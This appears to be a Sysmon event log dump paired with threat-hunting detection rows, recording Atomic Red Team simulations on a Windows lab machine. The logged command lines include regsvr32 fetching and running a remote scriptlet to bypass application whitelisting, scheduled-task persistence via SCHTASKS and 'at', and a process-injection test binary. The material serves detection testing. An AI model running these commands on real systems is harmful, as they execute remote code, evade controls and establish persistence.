+ + + 4038 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.049 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4038 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.049 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4037 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.010 + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4037 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.010 + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548024.026061,2019-07-19T18:53:44.026061+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4036 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:43.460 + 747F3D96-D977-5D31-0000-0010771B3800 + 1476 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548023.574378,2019-07-19T18:53:43.574378+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4035 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:43.339 + 747F3D96-D977-5D31-0000-00100A0E3800 + 3848 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\calc.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-D976-5D31-0000-001093EA3700 + 2332 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4033 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.834 + 747F3D96-D976-5D31-0000-001093EA3700 + 2332 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4033 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.834 + 747F3D96-D976-5D31-0000-001093EA3700 + 2332 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4033 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.834 + 747F3D96-D976-5D31-0000-001093EA3700 + 2332 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4032 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.803 + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4032 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.803 + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548022.815966,2019-07-19T18:53:42.815966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4031 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.384 + 747F3D96-D976-5D31-0000-0010D8D53700 + 6312 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548022.301844,2019-07-19T18:53:42.301844+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "arp -a" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4029 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.259 + 747F3D96-D976-5D31-0000-0010DBCC3700 + 6292 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "arp -a" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548022.276408,2019-07-19T18:53:42.276408+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4028 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.051 + 747F3D96-D976-5D31-0000-00104AC63700 + 6412 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.828722,2019-07-19T18:57:46.828722+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4088 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.531 + 747F3D96-DA6A-5D31-0000-001025AD3E00 + 4552 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1563548266.608481,2019-07-19T18:57:46.608481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4086 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence - Scheduled Task Management + 2019-07-19 14:57:46.443 + 747F3D96-DA6A-5D31-0000-0010C4A83E00 + 1408 + C:\Windows\System32\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 + 747F3D96-DA6A-5D31-0000-001072A63E00 + 4276 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.459733,2019-07-19T18:57:46.459733+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4085 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.411 + 747F3D96-DA6A-5D31-0000-001072A63E00 + 4276 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.422427,2019-07-19T18:57:46.422427+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4084 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.174 + 747F3D96-DA6A-5D31-0000-0010C09D3E00 + 3224 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.094355,2019-07-19T18:57:46.094355+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "at 13:20 /interactive cmd" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4082 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.051 + 747F3D96-DA6A-5D31-0000-0010B2953E00 + 5036 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "at 13:20 /interactive cmd" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548264.283188,2019-07-19T18:57:44.283188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4080 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:16.531 + 747F3D96-DA4C-5D31-0000-001077603D00 + 6172 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548236.552097,2019-07-19T18:57:16.552097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c .\bin\T1055.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:16.477 + 747F3D96-DA4C-5D31-0000-0010655D3D00 + 2596 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c .\bin\T1055.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + 